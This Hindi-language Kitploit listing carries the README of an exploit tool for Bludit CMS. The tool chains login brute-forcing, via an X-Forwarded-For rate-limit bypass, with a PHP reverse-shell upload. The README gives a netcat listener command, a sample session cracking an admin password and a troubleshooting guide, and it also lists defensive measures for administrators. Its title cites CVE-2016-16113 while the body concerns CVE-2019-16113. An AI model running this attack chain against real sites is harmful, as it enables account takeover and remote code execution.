Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/d3vn0mi/cve-2016-16113-poc
पासवर्ड हमलेपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubd3vn0mi/cve-2016-16113-poc

CVE-2016-16113-POC

cve-2016-16113

रिपॉजिटरी देखें
1128 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Get RCE - Bludit CMS शोषण

     _ _____             ___            _ 
  __| |___ /_   ___ __  / _ \ _ __ ___ (_)
 / _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
 \__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|

एक स्वचालित शोषण उपकरण जो CVE-2019-17240 (प्रमाणीकरण बायपास) और CVE-2019-16113 (मनमाना फ़ाइल अपलोड) को जोड़कर कमजोर Bludit CMS इंस्टॉलेशन पर रिमोट कोड निष्पादन प्राप्त करता है।

⚠️ कानूनी अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण के लिए

यह उपकरण सुरक्षा पेशेवरों के लिए है जो अधिकृत पैठ परीक्षण कर रहे हैं और सुरक्षा शोधकर्ता जो कानूनी सीमाओं के भीतर काम कर रहे हैं। कंप्यूटर सिस्टम तक अनाधिकृत पहुँच संयुक्त राज्य अमेरिका में कंप्यूटर फ्रॉड एंड अब्यूज एक्ट (CFAA) और दुनिया भर में समान कानूनों के तहत अवैध है।

इस उपकरण का उपयोग करके, आप सहमत हैं:

  • केवल उन सिस्टम का परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करें
  • अपने कार्यों की पूरी जिम्मेदारी स्वीकार करें

लेखक कोई देयता नहीं लेता है और इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

📋 अवलोकन

यह शोषण निम्नलिखित प्रक्रिया को स्वचालित करता है:

  1. लक्ष्य की उपलब्धता की जाँच करना
  2. ब्रूट फोर्स के माध्यम से प्रमाणीकरण को बायपास करना (CVE-2019-17240 का लाभ उठाकर)
  3. एक दुर्भावनापूर्ण PHP रिवर्स शेल अपलोड करना (CVE-2019-16113 का शोषण करके)
  4. रिवर्स शेल कनेक्शन स्थापित करना

भेद्यता विवरण

  • CVE-2019-17240: अनुचित दर-सीमा कार्यान्वयन के माध्यम से प्रमाणीकरण बायपास (X-Forwarded-For हेडर हेरफेर का उपयोग करके बायपास)
  • CVE-2019-16113: मनमाना फ़ाइल अपलोड भेद्यता जो दुर्भावनापूर्ण PHP कोड के निष्पादन की अनुमति देती है

प्रभावित संस्करण: Bludit CMS संस्करण 3.9.2 और उससे नीचे

🚀 विशेषताएँ

  • ✅ स्वचालित लक्ष्य उपलब्धता जाँच
  • ✅ ब्रूट फोर्स के माध्यम से प्रमाणीकरण बायपास
  • ✅ उपयोगकर्ता नाम गणना क्षमता
  • ✅ संयुक्त उपयोगकर्ता नाम + पासवर्ड ब्रूट फोर्सिंग
  • ✅ स्वचालित CSRF टोकन हैंडलिंग
  • ✅ PHP रिवर्स शेल पेलोड जनरेशन
  • ✅ बेहतर शोषण के लिए .htaccess अपलोड
  • ✅ कनेक्शन सत्यापन

📦 आवश्यकताएँ

  • Python 3.6+
  • आवश्यक Python पैकेज:
    • requests

🔧 स्थापना

# रिपॉजिटरी को क्लोन करें
git clone https://github.com/yourusername/get-rce.git
cd get-rce

# निर्भरताएँ स्थापित करें
pip install -r requirements.txt

requirements.txt:

requests>=2.25.0

💻 उपयोग

बुनियादी उपयोग

python3 get_rce.py

स्क्रिप्ट आपसे निम्नलिखित पूछेगी:

  1. लक्ष्य URL (जैसे, https://target.com)
  2. आपके लिसनर का IP पता
  3. आपके लिसनर का पोर्ट
  4. क्या उपयोगकर्ता नाम ब्रूट फोर्स करना है
  5. वर्डलिस्ट स्थान

अपना Listener सेट करना

शोषण चलाने से पहले, एक netcat लिसनर सेट करें:

nc -lvnp 4444

4444 को अपने चुने गए पोर्ट से बदलें।

उदाहरण सत्र

$ python3 get_rce.py

Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...

[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username): 
[...] We are gonna default to 'admin' as username.

[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)

[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php

हमले के मोड

मोड 1: ज्ञात उपयोगकर्ता नाम + पासवर्ड ब्रूट फोर्स

Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt

मोड 2: पूर्ण क्रेडेंशियल ब्रूट फोर्स

Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt

📝 अनुशंसित शब्दसूची

  • SecLists: https://github.com/danielmiessler/SecLists

    • उपयोगकर्ता नाम: SecLists/Usernames/Names/names.txt
    • पासवर्ड: SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
  • RockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)

🔍 यह कैसे काम करता है

  1. लक्ष्य सत्यापन: जाँचता है कि लक्ष्य तक पहुँचा जा सकता है
  2. प्रमाणीकरण बायपास:
    • दर सीमित करने के लिए X-Forwarded-For हेडर में हेरफेर करता है
    • प्रदान की गई शब्दसूचियों का उपयोग करके क्रेडेंशियल्स को ब्रूट फोर्स करता है
    • CSRF टोकन को स्वचालित रूप से संभालता है
  3. शोषण:
    • PHP रिवर्स शेल को /bl-content/tmp/ पर अपलोड करता है
    • निष्पादन सुनिश्चित करने के लिए .htaccess फ़ाइल अपलोड करता है
    • रिवर्स शेल स्थापित करने के लिए पेलोड को ट्रिगर करता है
  4. शेल एक्सेस: आपके लिसनर से वापस कनेक्ट होता है

🛡️ रक्षात्मक उपाय

यदि आप सिस्टम प्रशासक हैं:

  • तुरंत अपडेट करें Bludit 3.9.3 या उसके बाद के संस्करण पर
  • IP के बजाय सत्र के आधार पर उचित दर सीमा लागू करें
  • सभी फ़ाइल अपलोड को मान्य करें (प्रकार, एक्सटेंशन, सामग्री)
  • वेब एप्लिकेशन फ़ायरवॉल (WAF) का उपयोग करें
  • संदिग्ध फ़ाइलों के लिए /bl-content/tmp/ निर्देशिका की निगरानी करें
  • मजबूत पासवर्ड नीतियाँ लागू करें
  • खाता लॉकआउट तंत्र सक्षम करें

🐛 समस्या निवारण

समस्या: "The target seems to be down"

  • सत्यापित करें कि URL सही है और इसमें प्रोटोकॉल (http/https) शामिल है
  • अपनी नेटवर्क कनेक्टिविटी जाँचें
  • सुनिश्चित करें कि लक्ष्य वास्तव में Bludit चला रहा है

समस्या: "Login failed"

  • सत्यापित करें कि क्रेडेंशियल्स सही हैं
  • अधिक व्यापक शब्दसूची आज़माएँ
  • जाँचें कि लक्ष्य में अतिरिक्त प्रमाणीकरण तंत्र हैं

समस्या: "No shell received"

  • सत्यापित करें कि आपका लिसनर चल रहा है
  • दोनों तरफ फ़ायरवॉल नियम जाँचें
  • सुनिश्चित करें कि लिसनर IP और पोर्ट सही और पहुँच योग्य हैं

🔗 संदर्भ

  • CVE-2019-17240 विवरण
  • CVE-2019-16113 विवरण
  • Bludit आधिकारिक वेबसाइट

👤 लेखक

d3vn0mi

📄 लाइसेंस

यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इस README के शीर्ष पर दिए गए अस्वीकरण देखें।

🤝 योगदान

योगदान, मुद्दे और सुविधा अनुरोधों का स्वागत है! बेझिझक मुद्दों के पृष्ठ पर जाएँ।

⭐ आभार

  • इन भेद्यताओं की खोज और दस्तावेजीकरण के लिए सुरक्षा अनुसंधान समुदाय
  • इन मुद्दों को त्वरित रूप से पैच करने के लिए Bludit टीम
टूल डाउनलोड करें